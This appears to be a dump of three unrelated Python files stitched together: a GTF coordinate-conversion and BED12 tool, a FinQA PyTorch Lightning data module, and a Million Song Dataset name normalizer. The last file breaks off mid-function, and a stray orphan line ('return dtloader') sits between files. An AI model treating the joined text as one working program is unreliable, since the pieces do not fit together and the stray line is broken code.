    All genomic coordinates are 1-based and inclusive. Region lists must be
    sorted via :meth:`update` before any coordinate conversion is used.
    Transcript (tpos) and CDS (cpos) coordinates are 1-based and run 5'->3'
    along the gene's strand.
    """

    def __init__(self, tx_id: str, gene: Gene):
        self.tx_id: str = tx_id
        self.gene: Gene = gene
        self.exons: List[Region] = []
        self.cdss: List[Region] = []
        self.stop_codon: List[Region] = []

    def add_region(self, region, region_type):
        """Append a region of the given GTF feature type; other types are ignored."""
        if region_type == 'exon':
            self.exons.append(region)
        elif region_type == 'CDS':
            self.cdss.append(region)
        elif region_type == 'stop_codon':
            self.stop_codon.append(region)
        return

    def update(self):
        """
        Update the order of regions so that operations related to intervals can
        work correctly.
        """
        self.exons = sorted(self.exons, key=lambda r: r.start)
        self.cdss = sorted(self.cdss, key=lambda r: r.start)
        self.stop_codon = sorted(self.stop_codon, key=lambda r: r.start)
        return

    def __len__(self):
        # spliced (exonic) length of the transcript
        return sum(len(i) for i in self.exons)

    @property
    def n_exons(self):
        return len(self.exons)

    @property
    def cds_len(self):
        return sum(len(i) for i in self.cdss)

    @property
    def tx_start(self):
        """Genomic position of the transcript 5' end (strand-aware)."""
        if self.gene.strand == '+':
            return self.exons[0].start
        else:
            return self.exons[-1].end

    @property
    def tx_end(self):
        """Genomic position of the transcript 3' end (strand-aware)."""
        if self.gene.strand == '+':
            return self.exons[-1].end
        else:
            return self.exons[0].start

    @property
    def cds_start(self):
        """Genomic position of the CDS 5' end, or None if there is no CDS."""
        if len(self.cdss) == 0:
            return None
        elif self.gene.strand == '+':
            return self.cdss[0].start
        else:
            return self.cdss[-1].end

    @property
    def cds_end(self):
        """Genomic position of the CDS 3' end, or None if there is no CDS."""
        if len(self.cdss) == 0:
            return None
        elif self.gene.strand == '+':
            return self.cdss[-1].end
        else:
            return self.cdss[0].start

    @property
    def stop_codon_start(self):
        """Genomic position of the stop codon 5' end, or None if absent."""
        if len(self.stop_codon) == 0:
            return None
        elif self.gene.strand == '+':
            # BUGFIX: previously returned stop_codon[-1].end (and [0].start
            # for '-'), making stop_codon_start identical to stop_codon_end.
            # Mirror cds_start instead.
            return self.stop_codon[0].start
        else:
            return self.stop_codon[-1].end

    @property
    def stop_codon_end(self):
        """Genomic position of the stop codon 3' end, or None if absent."""
        if len(self.stop_codon) == 0:
            return None
        elif self.gene.strand == '+':
            return self.stop_codon[-1].end
        else:
            return self.stop_codon[0].start

    @property
    def introns(self):
        """Intronic Regions between consecutive exons (empty if single-exon)."""
        if len(self.exons) == 1:
            return []
        else:
            return [Region(self.exons[i].end + 1, self.exons[i+1].start - 1)
                    for i in range(self.n_exons - 1)]

    def tpos_to_gpos(self, pos: int):
        """
        transform transcript coordinate to genomic coordinate
        param pos: int, position on transcript, 1-based.
        return: genomic position; 0 if pos < 1, -1 if pos is past the 3' end.
        """
        if pos < 1:
            return 0
        elif pos > len(self):
            return -1
        else:
            if self.gene.strand == '-':
                # walk exons left-to-right regardless of strand
                pos = len(self) - pos + 1
            for i in range(self.n_exons):
                if len(self.exons[i]) < pos:
                    pos -= len(self.exons[i])
                else:
                    return self.exons[i].start + pos - 1

    def gpos_to_tpos(self, pos):
        """
        transform genomic coordinate to transcript coordinate
        param pos: int, position on genome, 1-based.
        return: (tpos, ptype) where ptype is 'exon', 'intron_<k>',
                'upstream' or 'downstream'; tpos is the distance for the
                non-exonic cases.
        """
        if pos < self.exons[0].start:
            tpos = self.exons[0].start - pos
            ptype = 'upstream' if self.gene.strand == '+' else 'downstream'
            return tpos, ptype
        elif pos > self.exons[-1].end:
            tpos = pos - self.exons[-1].end
            ptype = 'downstream' if self.gene.strand == '+' else 'upstream'
            return tpos, ptype
        else:
            tpos = 0
            for i in range(self.n_exons):
                if self.exons[i].start <= pos:
                    if self.exons[i].end <= pos:
                        tpos += len(self.exons[i])
                    else:
                        tpos += pos - self.exons[i].start + 1
                else:
                    # pos lies before exon i but inside the transcript span,
                    # i.e. in intron i (label is strand-aware)
                    if self.exons[i-1].end < pos:
                        if self.gene.strand == '+':
                            ptype = 'intron_' + str(i)
                            tpos = pos - self.exons[i - 1].end
                        else:
                            ptype = 'intron_' + str(len(self.exons) - i)
                            tpos = self.exons[i].start - pos
                        # BUGFIX: removed unreachable `break` after `return`
                        return tpos, ptype
            ptype = 'exon'
            tpos = tpos if self.gene.strand == '+' else len(self) - tpos + 1
            return tpos, ptype

    def cpos_to_gpos(self, pos):
        """
        transform CDS coordinate to genomic coordinate
        param pos: int position on CDS, 1-based.
        """
        tpos = self.gpos_to_tpos(self.cds_start)[0] + pos - 1
        gpos = self.tpos_to_gpos(tpos)
        return gpos

    def gpos_to_cpos(self, pos):
        """
        transform genomic coordinate to CDS coordinate
        param: int, position on genome, 1-based.
        """
        tpos = self.gpos_to_tpos(pos)[0]
        cpos = tpos - self.gpos_to_tpos(self.cds_start)[0] + 1
        return cpos

    def tiv_to_giv(self, pos1, pos2):
        """
        given transcript region boundary:
        return one or more (for features spanning more than one exon)
        exonic region interval(s) as a list of Region
        param pos1: int, left transcript coordinate, 1-based.
        param pos2: int, right transcript coordinate, 1-based.
        """
        cod1 = self.tpos_to_gpos(pos1)
        cod2 = self.tpos_to_gpos(pos2)
        start = min(cod1, cod2)
        end = max(cod1, cod2)
        givs = []
        for i in range(self.n_exons):
            if self.exons[i].end < start:
                continue
            if self.exons[i].start > end:
                break
            # clip the exon to [start, end]
            if self.exons[i].start <= start:
                if self.exons[i].end <= end:
                    givs.append(Region(start, self.exons[i].end))
                else:
                    givs.append(Region(start, end))
            else:
                if self.exons[i].end <= end:
                    givs.append(Region(self.exons[i].start, self.exons[i].end))
                else:
                    givs.append(Region(self.exons[i].start, end))
        return givs

    @property
    def five_prime_utrs(self):
        """5' UTR exonic Regions (empty without a CDS or when CDS starts at tx start)."""
        if len(self.cdss) == 0 or self.cds_start == self.tx_start:
            return []
        else:
            return self.tiv_to_giv(1, self.gpos_to_tpos(self.cds_start)[0] - 1)

    @property
    def three_prime_utrs(self):
        """3' UTR exonic Regions, taken after the stop codon when annotated."""
        if len(self.cdss) == 0 or self.stop_codon_end == self.tx_end or self.cds_end == self.tx_end:
            return []
        else:
            if len(self.stop_codon) > 0:
                return self.tiv_to_giv(self.gpos_to_tpos(self.stop_codon_end)[0] + 1, len(self))
            else:
                return self.tiv_to_giv(self.gpos_to_tpos(self.cds_end)[0] + 1, len(self))

    def format_region_bed12(self, rs, flank=0):
        """
        format a spliced region in a transcript into bed12 format
        param rs: a list of items of class Region
        param flank: bases by which the first/last block is extended
        """
        rs = sorted(rs, key=lambda r: r.start)
        if flank > 0:
            # BUGFIX: operate on copies — `rs` aliases the Region objects
            # stored on the transcript, so mutating them here corrupted
            # tx.exons/tx.cdss for later calls.
            rs = [Region(r.start, r.end) for r in rs]
            rs[0].start -= flank
            rs[-1].end += flank
        starts = [r.start - 1 for r in rs]  # BED is 0-based, half-open
        ends = [r.end for r in rs]
        blockstart = [str(x - starts[0]) for x in starts]
        blocksize = [str(len(r)) for r in rs]
        s = [self.gene.chrom, starts[0], ends[-1], self.tx_id, self.gene.gene_id,
             self.gene.strand, '0', '0', '0', len(starts)]
        s = s + [','.join(blocksize) + ',', ','.join(blockstart) + ',']
        return s
###############################################################################
# functions ###################################################################
###############################################################################
def parse_gtf(gtf_file):
    """
    read GTF file
    param: path to GTF file ('-' for stdin), gzipped format allowed.
    return: dict mapping transcript_id -> Transcript (regions sorted).
    """
    gtf = {}
    if gtf_file.endswith('.gz'):
        f = gzip.open(gtf_file, 'rt')
    elif gtf_file == '-':
        f = sys.stdin
    else:
        f = open(gtf_file)
    try:
        for line in f:
            if line[0] == '#':
                continue
            ary = line.strip().split('\t')
            m = re.search(r'gene_id "(.*?)".*?transcript_id "(.*?)"', ary[8])
            if m:
                if m.group(2) in gtf:
                    gtf[m.group(2)].add_region(region=Region(int(ary[3]), int(ary[4])), region_type=ary[2])
                else:
                    gene = Gene(gene_id=m.group(1), chrom=ary[0], strand=ary[6])
                    tx = Transcript(tx_id=m.group(2), gene=gene)
                    tx.add_region(region=Region(int(ary[3]), int(ary[4])), region_type=ary[2])
                    gtf[m.group(2)] = tx
    finally:
        # BUGFIX: never close sys.stdin (the '-' case); close only files we
        # opened, and do so even if parsing raises.
        if f is not sys.stdin:
            f.close()
    for tx in gtf:
        gtf[tx].update()
    return gtf
def exon_to_bed(gtf_file, extend=0):
    """
    print exons of each transcript in bed12 format
    param: path to GTF file, gzipped format allowed.
    param extend: bases of flank added at both ends
    """
    for tx in parse_gtf(gtf_file).values():
        fields = tx.format_region_bed12(tx.exons, flank=extend)
        print('\t'.join(map(str, fields)))
    return
def cds_to_bed(gtf_file, extend=0):
    """
    print CDSs of each transcript in bed12 format
    param: path to GTF file, gzipped format allowed.
    param extend: bases of flank added at both ends
    """
    for tx in parse_gtf(gtf_file).values():
        if tx.cdss:  # skip non-coding transcripts
            fields = tx.format_region_bed12(tx.cdss, flank=extend)
            print('\t'.join(map(str, fields)))
    return
def utr5_to_bed(gtf_file, extend=0):
    """
    print UTR5 of each transcript in bed12 format
    param: path to GTF file, gzipped format allowed.
    param extend: bases of flank added at both ends
    """
    gtf = parse_gtf(gtf_file)
    for tx_id in gtf:
        tx = gtf[tx_id]
        tx_utr5 = tx.five_prime_utrs
        if len(tx_utr5) > 0:
            # BUGFIX: `extend` was accepted but never forwarded, unlike the
            # other *_to_bed helpers.
            items = tx.format_region_bed12(tx_utr5, flank=extend)
            print('\t'.join(str(i) for i in items))
    return
def utr3_to_bed(gtf_file, extend=0):
    """
    print UTR3 of each transcript in bed12 format
    param: path to GTF file, gzipped format allowed.
    param extend: bases of flank added at both ends
    """
    for tx in parse_gtf(gtf_file).values():
        regions = tx.three_prime_utrs
        if regions:
            fields = tx.format_region_bed12(regions, flank=extend)
            print('\t'.join(map(str, fields)))
    return
def t2g(gtf_file, tfile):
    """
    convert transcript coordinates to genomic coordinates
    param: path to GTF file, gzipped format allowed.
    param tfile: tab-delimited file, 1st column=tx, 2nd column = tpos
    """
    gtf = parse_gtf(gtf_file)
    with open(tfile) as fh:
        for row in csv.reader(fh, delimiter="\t"):
            try:
                tx = gtf[row[0]]
            except KeyError:
                print('Tx isoform {} was not found in GTF file!'.format(row[0]), file=sys.stderr)
                row += ['NA'] * 3
            else:
                gpos = tx.tpos_to_gpos(int(row[1]))
                row += [tx.gene.chrom, tx.gene.strand, str(gpos)]
            print('\t'.join(row))
    return
def g2t(gtf_file, gfile):
    """
    convert genomic coordinates to transcript coordinates
    param: path to GTF file, gzipped format allowed.
    param gfile: tab-delimited file, 1st column=tx, 2nd column = gpos
    """
    gtf = parse_gtf(gtf_file)
    with open(gfile) as fh:
        for row in csv.reader(fh, delimiter='\t'):
            try:
                tx = gtf[row[0]]
            except KeyError:
                print('Tx isoform {} was not found in GTF file!'.format(row[0]), file=sys.stderr)
                row += ['NA'] * 2
            else:
                tpos, ptype = tx.gpos_to_tpos(int(row[1]))
                row += [str(tpos), ptype]
            print('\t'.join(row))
    return
def tiv2giv(gtf_file, tivfile):
    """
    convert transcript intervals to genomic intervals
    param: path to GTF file, gzipped format allowed.
    param tivfile: tab-delimited, first three columns are tx_id, start, and end, 1-based
    """
    gtf = parse_gtf(gtf_file)
    with open(tivfile) as fh:
        for row in csv.reader(fh, delimiter='\t'):
            if row[0] not in gtf:
                print('Tx isoform {} was not found in GTF file!'.format(row[0]), file=sys.stderr)
                continue
            tx = gtf[row[0]]
            givs = tx.tiv_to_giv(int(row[1]), int(row[2]))
            print('\t'.join(str(i) for i in tx.format_region_bed12(givs)))
    return
def giv2tiv(gtf_file, givfile):
    """
    convert genomic intervals to transcript intervals
    param: path to GTF file, gzipped format allowed.
    param givfile: tab-delimited, first three columns are tx_id, start, and end, 1-based
    """
    gtf = parse_gtf(gtf_file)
    with open(givfile) as fh:
        for row in csv.reader(fh, delimiter='\t'):
            try:
                tx = gtf[row[0]]
                # report boundaries 5'->3': swap the ends on the minus strand
                if tx.gene.strand == '+':
                    left, right = row[1], row[2]
                else:
                    left, right = row[2], row[1]
                pos_l = tx.gpos_to_tpos(int(left))
                pos_r = tx.gpos_to_tpos(int(right))
                row += [str(pos_l[0]), str(pos_r[0]), pos_l[1], pos_r[1]]
            except KeyError:
                row += ['NA'] * 4
                print('Tx isoform {} was not found in GTF file!'.format(row[0]), file=sys.stderr)
            print('\t'.join(row))
    return
def tx_info(gtf_file):
    """
    print summary information of each transcript
    param: path to GTF file, gzipped format allowed.
    note: stop codon is counted for CDS length, so that cds + utr5 + utr3 = transcript length
    """
    print('\t'.join(['tx_id', 'gene_id', 'chrom', 'strand', 'len',
                     'len_cds', 'len_utr5', 'len_utr3']))
    for tx in parse_gtf(gtf_file).values():
        total = len(tx)
        utr5 = sum(len(r) for r in tx.five_prime_utrs)
        cds = sum(len(r) for r in tx.cdss) + sum(len(r) for r in tx.stop_codon)
        utr3 = total - cds - utr5
        fields = [tx.tx_id, tx.gene.gene_id, tx.gene.chrom, tx.gene.strand,
                  total, cds, utr5, utr3]
        print('\t'.join(str(f) for f in fields))
    return
if __name__ == "__main__":
    # parent parser that holds the common -g/--gtf argument
    parent_parser = argparse.ArgumentParser(add_help=False)
    parent_parser.add_argument('-g', '--gtf',
        type=str, default='-', help='input gtf file')
    # main parser with subparsers
    parser = argparse.ArgumentParser(prog='GTFtools.py',
        description='GTF file manipulation')
    subparsers = parser.add_subparsers(title='GTF operations',
        help='supported operations', dest='subcmd')
    # BUGFIX: txinfo must inherit parent_parser, otherwise args.gtf does not
    # exist for the 'txinfo' subcommand and tx_info(args.gtf) crashes.
    parser_txinfo = subparsers.add_parser('txinfo',
        help='summary information of each transcript', parents=[parent_parser],
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser_tobed = subparsers.add_parser('convert2bed',
        help='convert GTF to bed12 format', parents=[parent_parser],
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser_tobed.add_argument('-t', '--type',
        type=str, default='exon',
        choices=['exon', 'cds', 'utr5', 'utr3'],
        help='types of intervals to be converted to bed for each transcript')
    parser_tobed.add_argument('-e', '--extend',
        type=int, default=0,
        help='number of bases to extend at both sides')
    parser_t2g = subparsers.add_parser('t2g',
        help='convert tpos to gpos', parents=[parent_parser],
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser_t2g.add_argument('-i', '--infile', type=str,
        help='tab-delimited file with the first two columns composed of '
             'tx_id and transcript coordinates')
    parser_g2t = subparsers.add_parser('g2t',
        help='convert gpos to tpos', parents=[parent_parser],
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser_g2t.add_argument('-i', '--infile', type=str,
        help='tab-delimited file with the first two columns composed of '
             'tx_id and genomic coordinates')
    parser_tiv2giv = subparsers.add_parser('tiv2giv',
        help='convert tiv to giv', parents=[parent_parser],
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser_tiv2giv.add_argument('-i', '--infile', type=str,
        help='tab-delimited file with the first three columns composed of '
             'tx_id, start and end coordinates')
    parser_giv2tiv = subparsers.add_parser('giv2tiv',
        help='convert giv to tiv', parents=[parent_parser],
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser_giv2tiv.add_argument('-i', '--infile', type=str,
        help='tab-delimited file with the first three columns composed of '
             'tx_id, start and end coordinates')
    args = parser.parse_args()
    # dispatch on subcommand
    if args.subcmd == 'convert2bed':
        if args.type == 'exon':
            exon_to_bed(args.gtf, args.extend)
        elif args.type == 'cds':
            cds_to_bed(args.gtf, args.extend)
        elif args.type == 'utr5':
            utr5_to_bed(args.gtf, args.extend)
        else:
            utr3_to_bed(args.gtf, args.extend)
    elif args.subcmd == 'txinfo':
        tx_info(args.gtf)
    # BUGFIX: the keyword must match the function signatures (gtf_file, not
    # gtf) — every coordinate subcommand previously raised TypeError.
    elif args.subcmd == 't2g':
        t2g(gtf_file=args.gtf, tfile=args.infile)
    elif args.subcmd == 'g2t':
        g2t(gtf_file=args.gtf, gfile=args.infile)
    elif args.subcmd == 'tiv2giv':
        tiv2giv(gtf_file=args.gtf, tivfile=args.infile)
    elif args.subcmd == 'giv2tiv':
        giv2tiv(gtf_file=args.gtf, givfile=args.infile)
|
import json
import logging
import sys
import os
import torch
from typing import Dict, Iterable, List, Any, Optional, Union
from pytorch_lightning import LightningDataModule
from torch.utils.data import Dataset
from lightning_modules.models.seq2seq_model_util import get_model, left_pad_sequences
from transformers import BertTokenizer, RobertaTokenizer
import program_generation_utils
from program_generation_utils import *
from utils import *
from torch.utils.data import DataLoader
# Disable HuggingFace tokenizers' thread parallelism (avoids fork warnings).
os.environ['TOKENIZERS_PARALLELISM']='0'
# NOTE(review): absolute, machine-specific paths — parameterize before reuse.
op_list_file = "/home/lily/yz979/code/LogicNLG_2/retriever/operation_list.txt"
log_file = "log.txt"
const_list_file = "/home/lily/yz979/code/LogicNLG_2/retriever/constant_list.txt"
# Program-token vocabulary: each operation token is opened with '(' and the
# special tokens are prepended.
op_list = read_txt(op_list_file, log_file)
op_list = [op + '(' for op in op_list]
op_list = ['EOF', 'UNK', 'GO', ')'] + op_list
# Constants are normalized to lowercase with '.' replaced by '_'.
const_list = read_txt(const_list_file, log_file)
const_list = [const.lower().replace('.', '_') for const in const_list]
reserved_token_size = len(op_list) + len(const_list)
valid_file = "dataset/data/val.json"
class FinQADataset(Dataset):
    """Dataset of FinQA entries converted to program-generation features.

    Entries are read from a JSON file, turned into examples with
    `program_generation_utils.read_mathqa_entry`, then converted to model
    features via `convert_examples_to_features`.
    """

    def __init__(
            self,
            model_name: str,
            file_path: str,
            max_seq_length: int,
            max_program_length: int,
            max_instances: int,
            mode: str = "train",
            **kwargs):
        super().__init__(**kwargs)
        assert mode in ["train", "test", "valid"]
        self.max_seq_length = max_seq_length
        self.max_program_length = max_program_length
        if model_name.startswith("bert"):
            self.tokenizer = BertTokenizer.from_pretrained(model_name)
        elif model_name.startswith("roberta"):
            self.tokenizer = RobertaTokenizer.from_pretrained(model_name)
        else:
            # BUGFIX: previously fell through silently, so self.tokenizer was
            # never set and self.read() crashed later with AttributeError.
            raise ValueError("Unsupported model name: {!r}; expected a "
                             "'bert*' or 'roberta*' checkpoint".format(model_name))
        self.max_instances = max_instances
        self.mode = mode
        self.instances = self.read(file_path, self.tokenizer)

    def read(self, input_path: str, tokenizer) -> Iterable[Dict[str, Any]]:
        """Load at most `max_instances` entries and convert them to features."""
        with open(input_path) as input_file:
            input_data = json.load(input_file)[:self.max_instances]
        examples = []
        for entry in input_data:
            example = program_generation_utils.read_mathqa_entry(entry, tokenizer)
            if example:  # entries that fail conversion are skipped
                examples.append(example)
        kwargs = {
            "examples": examples,
            "tokenizer": tokenizer,
            "max_seq_length": self.max_seq_length,
            "max_program_length": self.max_program_length,
            # only training mode builds training-style features
            "is_training": self.mode == "train",
            "op_list": op_list,
            "op_list_size": len(op_list),
            "const_list": const_list,
            "const_list_size": len(const_list),
            "verbose": True
        }
        data = convert_examples_to_features(**kwargs)
        return data

    def __getitem__(self, idx: int):
        return self.instances[idx]

    def __len__(self):
        return len(self.instances)

    def truncate(self, max_instances):
        """Keep the first `max_instances` items; return the removed tail."""
        truncated_instances = self.instances[max_instances:]
        self.instances = self.instances[:max_instances]
        return truncated_instances

    def extend(self, instances):
        """Append extra pre-built instances (e.g. a tail from truncate())."""
        self.instances.extend(instances)
def customized_collate_fn(examples: List) -> Dict[str, Any]:
    """Collate a batch of feature dicts.

    Tensorizable fields are left-padded into a single batch tensor; any field
    that cannot be tensorized/padded is passed through as a plain list.
    """
    result_dict = {}
    for k in examples[0].keys():
        try:
            result_dict[k] = left_pad_sequences([torch.tensor(ex[k]) for ex in examples],
                                                batch_first=True, padding_value=0)
        except Exception:
            # BUGFIX: narrowed from a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit. Non-tensor fields still fall
            # through to the list form.
            result_dict[k] = [ex[k] for ex in examples]
    return result_dict
class FinQADataModule(LightningDataModule):
    """Lightning data module wiring train/valid/test FinQADatasets."""

    def __init__(self,
                 model_name: str,
                 max_seq_length: int,
                 max_program_length: int,
                 batch_size: int = 1,
                 val_batch_size: int = 1,
                 train_file_path: str = None,
                 val_file_path: str = None,
                 test_file_path: str = None,
                 train_max_instances: int = sys.maxsize,
                 val_max_instances: int = sys.maxsize):
        super().__init__()
        self.model_name = model_name
        self.max_seq_length = max_seq_length
        self.max_program_length = max_program_length
        self.batch_size = batch_size
        self.val_batch_size = val_batch_size
        self.train_file_path = train_file_path
        self.val_file_path = val_file_path
        self.test_file_path = test_file_path
        self.train_max_instances = train_max_instances
        self.val_max_instances = val_max_instances
        # datasets are built lazily in setup()
        self.train_data = None
        self.val_data = None
        # BUGFIX: test_data was never initialized, so test_dataloader()'s
        # `if self.test_data is None` check raised AttributeError whenever
        # setup() had not already run.
        self.test_data = None

    # OPTIONAL, called for every GPU/machine (assigning state is OK)
    def setup(self, stage: Optional[str] = None):
        """Build all three datasets (train/valid/test) for the given stage.

        NOTE(review): all three file paths are read regardless of `stage` —
        confirm this is intended before running with partial paths.
        """
        assert stage in ["fit", "validate", "test"]
        self.train_data = FinQADataset(model_name=self.model_name,
                                       file_path=self.train_file_path,
                                       max_seq_length=self.max_seq_length,
                                       max_program_length=self.max_program_length,
                                       max_instances=self.train_max_instances,
                                       mode="train")
        self.val_data = FinQADataset(model_name=self.model_name,
                                     file_path=self.val_file_path,
                                     max_seq_length=self.max_seq_length,
                                     max_program_length=self.max_program_length,
                                     max_instances=self.val_max_instances,
                                     mode="valid")
        self.test_data = FinQADataset(model_name=self.model_name,
                                      file_path=self.test_file_path,
                                      max_seq_length=self.max_seq_length,
                                      max_program_length=self.max_program_length,
                                      max_instances=self.val_max_instances,
                                      mode="test")

    def train_dataloader(self):
        if self.train_data is None:
            self.setup(stage="fit")
        return DataLoader(self.train_data, batch_size=self.batch_size,
                          shuffle=True, drop_last=True,
                          collate_fn=customized_collate_fn)

    def val_dataloader(self):
        if self.val_data is None:
            self.setup(stage="validate")
        return DataLoader(self.val_data, batch_size=self.val_batch_size,
                          shuffle=False, drop_last=False,
                          collate_fn=customized_collate_fn)

    def test_dataloader(self):
        if self.test_data is None:
            self.setup(stage="test")
        return DataLoader(self.test_data, batch_size=self.val_batch_size,
                          shuffle=False, drop_last=False,
                          collate_fn=customized_collate_fn)
return dtloader |
"""
<NAME> (2011) Columbia University
<EMAIL>
This code contains functions to normalize an artist name,
and possibly a song title.
This is intended to do metadata matching.
It is mostly an elaborate hack, I never did an extensive search of
all problematic name matches.
Code developed using Python 2.6 on a Ubuntu machine, using UTF-8
This is part of the Million Song Dataset project from
LabROSA (Columbia University) and The Echo Nest.
Copyright 2011, <NAME>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import re
import sys
import unicodedata
import itertools
import Levenshtein # http://pypi.python.org/pypi/python-Levenshtein/
# ROTATION SYMBOLS (A and B => B and A)
rotation_symbols = ['\|', '/', '&', ',', '\+', ';', '_']#, '\-']
# words that join two artist names; used both for splitting and filtering
rotation_words = ['and', 'y', 'et', 'vs', 'vs.', 'v', 'with', 'feat',
                  'feat.', 'featuring', 'presents', 'ft.', 'pres.']
# SYMBOLS TO REMOVE AT THE BEGINNING
stub_to_remove = ['dj', 'dj.', 'mc', 'm.c.', 'mc.', 'the', 'los', 'les']
# SYMBOLS TO REMOVE AT THE END
end_to_remove1 = ['big band', 'trio', 'quartet', 'ensemble', 'orchestra']
end_to_remove2 = ['band']
# COMPILED REGULAR EXPRESSION
# white spaces
re_space = re.compile(r'\s')
# non alphanumeric
re_nonalphanum = re.compile(r'\W')
# rotation symbols
# NOTE(review): the alternation is not parenthesized, so '\s*?' binds only to
# the first and last alternatives; since both lazy quantifiers match empty,
# the pattern effectively just matches a single symbol — confirm before
# "fixing" with a group, as that would change matching of surrounding spaces.
re_rotsymbols = re.compile('\s*?' + '|'.join(rotation_symbols) + '\s*?')
# rotation words, required to be surrounded by whitespace
re_rotwords = re.compile(r'\s(' + '|'.join(rotation_words) + ')\s')
# stub to remove (anchored at string start via .match())
re_remstub = re.compile('(' + '|'.join(stub_to_remove) + ')\s(.*)')
# ending to remove
re_remending1 = re.compile('(.*)\s(' + '|'.join(end_to_remove1) + ')')
re_remending2 = re.compile('(.*)\s(' + '|'.join(end_to_remove2) + ')')
# quotes to remove
re_remquotes = re.compile('(.+)\s(".+?")\s(.+)')
# parenthesis to remove
re_remparenthesis = re.compile('(.+)\s(\(.+?\))\s*(.*)')
# brackets to remove
re_rembrackets = re.compile('(.+)\s(\[.+?\])\s*(.*)')
def char_is_ascii(c):
    """
    Check if a unicode character, e.g. u'A', u'1' or u'\u0301' is ASCII
    """
    #return ord(c) < 128
    # the following should be faster, according to:
    #http://stackoverflow.com/questions/196345/how-to-check-if-a-string-in-python-is-in-ascii
    # NOTE(review): this excludes DEL (0x7F) itself, unlike ord(c) < 128 —
    # harmless for printable text, but the two are not strictly equivalent.
    return c < u"\x7F"
def remove_non_ascii(s):
    """
    Normalize characters in unicode string 's' that are not ASCII,
    try to transform accented characters to non accented version.
    Otherwise, remove non-ascii chars.

    BUGFIX (Python 3): filter() returns an iterator there, not a string, so
    the kept characters must be joined back into a string; behavior is
    unchanged under Python 2.
    """
    # NFKD splits accented characters into base letter + combining mark;
    # the combining mark is then dropped by the ASCII test.
    decomposition = unicodedata.normalize('NFKD', s)
    # same test as char_is_ascii(), inlined to keep the function self-contained
    return u''.join(c for c in decomposition if c < u"\x7F")
def to_lower_case(s):
    """
    Transform a unicode string 's' to lowercase.
    Trivial, but kept as a named step of the normalization pipeline.
    """
    return s.lower()
def remove_spaces(s):
    """
    Remove all whitespace characters (spaces, tabs, newlines)
    from the unicode string s.
    """
    return re_space.sub('', s)
def replace_rotation_symbols(s):
    """
    Mostly, replace '&' (and the other separators | / , + ; _) by ' and '.
    Surrounding spaces are kept; downstream space normalization cleans up
    any doubled spaces this introduces.
    """
    return re_rotsymbols.sub(' and ', s)
def remove_stub(s):
    """
    Remove a questionable beginning ('dj', 'mc', 'the', ...);
    otherwise return the string unchanged.
    """
    m = re_remstub.match(s)
    # group(2) is everything after the leading stub + space
    return m.group(2) if m else s
def remove_endings(s):
    """
    Remove questionable endings, e.g. 'trio' then 'band', applied in order
    on the progressively shortened string.
    """
    for regex in (re_remending1, re_remending2):
        m = regex.match(s)
        if m:
            s = m.group(1)
    return s
def remove_quotes(s):
    """
    Remove a quoted nickname, like Thierry "The Awesomest" BM.
    """
    m = re_remquotes.match(s)
    if m is None:
        return s
    # the regex defines exactly three groups: before, "quoted", after
    before, _quoted, after = m.groups()
    return before + ' ' + after
def remove_parenthesis(s):
    """
    Remove a parenthesized part, like Thierry (Coolest guy).
    """
    m = re_remparenthesis.match(s)
    if m is None:
        return s
    parts = m.groups()
    assert len(parts) >= 2
    # keep text before (and, when present, after) the parenthesis
    if len(parts) == 2:
        return parts[0]
    return parts[0] + ' ' + parts[2]
def remove_brackets(s):
    """
    Remove a bracketed part, like Thierry [Coolest guy].
    """
    m = re_rembrackets.match(s)
    if m is None:
        return s
    parts = m.groups()
    assert len(parts) >= 2
    # keep text before (and, when present, after) the brackets
    if len(parts) == 2:
        return parts[0]
    return parts[0] + ' ' + parts[2]
def normalize_no_rotation(s):
    """
    Normalize a name that is supposed to contain no
    rotation term ('and', 'y', ...).
    """
    # apply the cleanups in a fixed order: stub, endings, (), ""
    for cleanup in (remove_stub, remove_endings, remove_parenthesis, remove_quotes):
        s = cleanup(s)
    return s
def split_rotation_words(s):
    """
    Split a name using the rotation words ('and', 'vs', 'y', 'et', ...),
    then create all possible permutations of the parts.

    BUGFIX (Python 3): `filter(...)[:5]` raised TypeError (filter returns an
    iterator), and the reused `map` object was exhausted by its first loop so
    the second permutation pass silently produced nothing. Both are now list
    comprehensions; behavior is identical under Python 2.
    """
    # split on rotation words and drop the captured words themselves,
    # keeping at most 5 parts to bound the number of permutations
    parts = [p for p in re_rotwords.split(s) if p not in rotation_words][:5]
    results = set()
    # keep only the individual elems (risky?)
    results.update(parts)
    # create all permutations
    for perm in itertools.permutations(parts):
        results.add(' '.join(perm))
    # redo the same but remove the stub first for all parts
    parts = [normalize_no_rotation(p) for p in parts]
    results.update(parts)
    for perm in itertools.permutations(parts):
        results.add(' '.join(perm))
    return results
def remove_nonalphanumeric(s):
    """
    Remove usual punctuation signs: ! , ? : ; . ' etc
    Also, we transform long spaces into normal ones
    """
    # split around non-alphanumeric chars, drop empty fragments,
    # rejoin with a single regular space
    return ' '.join(p for p in re_nonalphanum.split(s) if p)
def normalize_artist(s):
    """
    Return a set of normalized versions of that artist name.
    """
    variants = set()
    # lower case
    s = to_lower_case(s)
    variants.add(s)
    # remove non-ascii chars (try to replace them)
    s = remove_non_ascii(s)
    variants.add(s)
    # try removing parenthesis before, in case there's an & in it
    variants.add(remove_parenthesis(s))
    # replace rotation symbols, then split/permute on rotation words
    s = replace_rotation_symbols(s)
    variants.update(split_rotation_words(s))
    # strip punctuation, then all spaces; the set de-duplicates
    return set(remove_spaces(remove_nonalphanumeric(v)) for v in variants)
def normalize_title(s):
    """
    Return a set of normalized versions of that title.
    """
    variants = set()
    # lower case
    s = to_lower_case(s)
    variants.add(s)
    # remove non-ascii chars (try to replace them)
    s = remove_non_ascii(s)
    variants.add(s)
    # try removing parenthesis, then brackets (each intermediate is kept)
    s = remove_parenthesis(s)
